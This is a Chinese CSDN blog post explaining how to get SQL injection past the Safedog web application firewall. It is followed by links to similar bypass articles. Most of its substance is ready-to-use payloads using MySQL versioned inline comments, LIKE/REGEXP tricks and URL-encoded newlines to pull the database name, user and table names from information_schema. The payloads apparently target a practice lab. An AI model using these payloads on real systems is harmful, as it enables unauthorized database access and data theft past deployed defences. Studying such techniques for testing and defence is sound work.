SQL注入绕过安全狗

最新推荐文章于 2024-08-08 10:48:47 发布
最新推荐文章于 2024-08-08 10:48:47 发布
阅读量1.3k 收藏 2
点赞数 1
文章标签: 安全 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45462249/article/details/125798934
版权
本文介绍了如何绕过网站安全狗的防护进行SQL注入攻击,包括内联注释绕过、模糊查询绕过等方法,并展示了如何查询数据库用户名和表信息。通过示例演示了各种绕过技巧,如使用LIKE和REGEXP进行模糊查询,以及结合UNION和SELECT查询敏感信息。
摘要由CSDN通过智能技术生成

SQL注入绕过安全狗

前期知识

网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具,WAF检测一般分为两种,一种白名单,一种黑名单。白名单相对于黑名单来说,更加安全,但是白名单由于设置的比较严格,有时会影响用户的正常访问,所以WAF还是用黑名单的比较多。

黑名单

WAF禁止了一些有关攻击语句的函数,用户一旦输入这些函数,就会被WAF拦截

演示开始

首先发现有注入,大多数人都是老方法(and 1=1)嘛,但是看效果
在这里插入图片描述
由于安全狗的防护,检测到了and函数,所以开始绕

内联注释绕过

内联注释绕过在一般的数据库是不会执行的,但是在mysql中内联注释中的语句会被执行,当!后面接数据库版本号时,如果自身版本号大于等于字符数,就会将注释中的内容执行,否则就会当做注释来处理。(但也不绝对,还得自己用burp跑一下确定版本号)
在这里插入图片描述

模糊查询绕过

LIKE//REGEXP 方法
在这里插入图片描述
在这里插入图片描述
相当于select * from student where snO=1 like "[%23]"为空
也就是说,就执行了select * from student;
所以
id=-1’ like “[%23]” /!10440union%0aselect/ 1,2,3 --+
在这里插入图片描述

1' REGEXP "[…%0a%23]" /*!11444 order %0a by*/ 1 --+  
1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,2,3 --+
也是可以的,REGEXP用法跟LIKE差不多,也是模糊查询

union /*//*//*!50344select*/1,2,3 --+

查询数据库用户名和表信息

查询这些分别注意union和select连接,from和表连接,还有database()括号的连接,需要用到以上方法结合起来
查询库

union /*//*//*!50344select*/1,2,database(/*!50644*/) --+

查询用户名

-1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,user(%0a /*!80000aaa*/),3 -- +

查询表名

  ?id=-1' union/*/!*!**/select%201,2,group_concat(table_name)from %0a /*!11444 /*REGEXP "[…%0a%23]"*/ %0a information_schema.tables*/  where table_schema='security'--+

等等

暂时是都可以绕过的,如果不行,可以试试FUZZ大法

成长中的小菜菜
关注
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sqlmap绕过安全狗
qq_50854662的博客
01-05 6102
sqlmap绕过安全狗
Web安全sql注入绕过技法
likinguuu的博客
11-25 1406
Web安全sql注入绕过技法
什么,有狗快跑!慢着,这次手把手教你怎么过安全狗!(sql注入篇)_sql注入绕最新安全狗
最新发布
heike_Ch的博客
08-08 813
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
【Python脚本】SQLMap的Tamper脚本——绕过安全狗
weixin_55205599的博客
10-18 559
针对WAF编写Tamper脚本进行绕过安装网站安全狗,此时再次尝试SQL注入时,安全狗会拦截。
19.sqlmap饶过waf安全狗
weixin_46525626的博客
07-13 820
因为大都是通过的方式进行拦截,所以如果出现了被拦截的情况,大概率是因为你的语句的触发了黑名单的验证机制,导致被拦截,那应该怎么检测呢?其实就行了,输入页面,如下说明“and 1”这个部分触发了拦截,此时的绕过方式可以选择替换或者绕过,这里我们先试试对中间的空格进行替换,空格的替换方式尤其多,我们不可能全部都能记住,所以这里就要FUZZ绕过方式一:IP白奖单从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。
SQL注入绕过手段
weixin_46709219的博客
12-27 2735
一)SQL注入绕过手段 1)大小写绕过 2)双写绕过 3)编码绕过 4)内联注释绕过 ———————————————————————————————————————————————————————— 一)SQL注入绕过手段 1)大小写绕过 如果程序中设置了过滤关键字但是过滤过程中并没有对关键字组成进行深入分析过滤,导致只是对整体进行过滤。例如:and 过滤,也就是说只是发现关键字出现并不会对关键字处理,对于这种方式的过滤我们可以采用“ 大小写绕过 ”这种过滤措施,例如:And 1=1 ,OrdEr
实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游.pdf
03-21
本资源为一篇实战渗透测试笔记,记录了作者从社工客服拿到密码登录后台加 SQL 注入绕过安全狗写入 webshell 到提权进内网漫游的整个过程。 一、初探 作者首先尝试使用自制字典工具“御剑”扫描网站,但发现无法...
SQL注入绕过实战案例
08-31
本文将深入探讨SQL注入的概念、工作原理,并通过"SQL注入实战案例"来阐述如何进行有效防御和绕过。我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台。 SQL注入SQL Injection)是...
SQL注入Bypass安全狗4.0.pdf
04-08
SQL注入攻击绕过安全狗4.0 SQL注入攻击是常见的Web应用安全漏洞之一,攻击者可以通过操纵SQL语句来访问或修改数据库中的数据。安全狗4.0是一款Web应用防火墙,可以检测和防止SQL注入攻击。但是,攻击者可以使用各种...
sql注入(三)绕过方法及防御手段
Innocence_0的博客
03-07 1898
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
SQL注入绕过安全狗的五种方法
01-11 1357
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
sql注入各种绕过
weixin_42478365的博客
08-01 8425
sql注入绕过
SQLMap的Tamper脚本
m0_62207482的博客
01-31 3303
SQLMap是一款用来检测与利用SQL注入漏洞的免费 开源工具,不仅可以实现SQL注入漏洞的检测与利用的自动化处理,而且其自带 的Tamper脚本可以帮助我们绕过IDS/WAF的检测。虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站 的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个 时候就需要我们针对目标的防护体系手动构建相应的Tamper脚本。Tamper脚本的构建非常简单,其实渗透测试中真正的难点在于如何针对目标 网站的防护找出对应的绕过方法。
第19篇:WEB漏洞~SQL注入~SqlMap绕过WAF
廖一语山的博客
08-06 2011
Sqlmap
记一次SQL注入绕过安全狗
weixin_51641247的博客
05-26 288
1、内联注释 可以绕过大多数情况2、在一些被拦截的地方多用/\*%23\*/和/\*!10440%0a\*/,有奇效。%23为#编码,%0A为换行一般来说,内联注释只有在紧跟版本号的情况下才有意义,其主要目的是通过版本号来控制部分语句在不同 MySQL 版本下的执行情况绕过原因:安全狗误以为/**/是注释的内容所以全部忽略。
SQL注入-安全狗apache绕过
遇事不决冲冲冲
05-26 2593
环境配置 Windows 10 phpstudy sqli-labs靶场 安全狗apache4.0.30255
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值